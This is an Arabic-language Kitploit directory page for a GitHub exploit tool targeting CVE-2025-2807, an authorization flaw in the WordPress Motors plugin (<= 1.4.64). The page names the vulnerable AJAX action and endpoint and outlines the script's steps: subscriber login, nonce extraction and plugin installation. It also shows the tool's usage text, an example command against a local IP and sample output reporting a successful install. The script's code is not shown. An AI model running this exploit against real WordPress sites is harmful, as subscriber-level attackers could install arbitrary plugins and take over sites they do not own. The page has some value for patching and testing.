Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-2807 — ووردبريس - Motors Plugin <= 1.4.64 - ثغرة تثبيت إضافات عشوائية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-2807
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubnxploited/cve-2025-2807

CVE-2025-2807

ووردبريس - Motors Plugin <= 1.4.64 - ثغرة تثبيت إضافات عشوائية

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-2807: Motors Plugin <= 1.4.64 - ثغرة تثبيت إضافات تعسفية

تم الاستغلال بواسطة: Nxploited | Khaled Alenazi


⚠️ ملخص الثغرة

الإضافة: Motors (<= 1.4.64)
النوع: نقص الترخيص للمستخدمين المصادق عليهم (مشترك+) لتثبيت إضافات تعسفية
الخطورة: 8.8 (CVSS v3)
تم الاكتشاف في: 07 أبريل 2025
VDP: لا


🔥 تأثير الاستغلال

تسمح هذه الثغرة لأي مستخدم WordPress مصادق عليه (مشترك+) بتثبيت إضافات تعسفية بدون أي فحص ترخيص مناسب.

بسبب عدم التحقق من الصلاحيات في دالة mvl_setup_wizard_install_plugin، يمكن لمستخدم ذو صلاحيات منخفضة تنفيذ إجراءات محجوزة للمسؤولين.

📅 من المتوقع استغلالها على نطاق واسع بسبب بساطتها وتأثيرها الحرج.


🚫 التفاصيل التقنية

  • النقطة الضعيفة: /wp-admin/admin-ajax.php
  • الإجراء الضعيف: mvl_setup_wizard_install_plugin
  • مستوى الوصول المطلوب: مشترك+ (مستخدم مسجل الدخول)
  • المشكلة الأساسية: عدم وجود current_user_can('install_plugins') أو فحص صلاحية مماثل

🚀 سكربت الاستغلال (بايثون)

يقوم هذا السكربت بـ:

  1. تسجيل الدخول كمشترك
  2. استخراج nonce المطلوب (من HTML أو JS)
  3. تشغيل طلب AJAX الضعيف لتثبيت الإضافة التي تختارها

📃 الاستخدام

root@kitploit:~
usage: CVE-2025-2807.py [-h] -u URL -un USERNAME -p PASSWORD [-pn PLUGIN]

Exploit For CVE-2025-2807 By: Nxploited | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site
  -un, --username USERNAME     Subscriber username
  -p, --password PASSWORD      Subscriber password
  -pn, --plugin PLUGIN         Plugin to install (default: contact-form-7)

🐞 مثال على التنفيذ

root@kitploit:~
python3 CVE-2025-2807.py -u http://192.168.1.100/wordpress -un subscriber -p 123456 -pn contact-form-7

المخرجات:

root@kitploit:~
[*] Logging in...
[+] Logged in successfully.
[*] Fetching setup wizard page...
[+] Found nonce in HTML: 428cdf8347
[*] Attempting to install plugin: contact-form-7
[+] Plugin installation request sent successfully!
[+] Response: {"success":true,"data":"Plugin succesfully activated"}

✨ تم الاستغلال بواسطة Nxploited (Khaled Alenazi)

تنزيل الأداة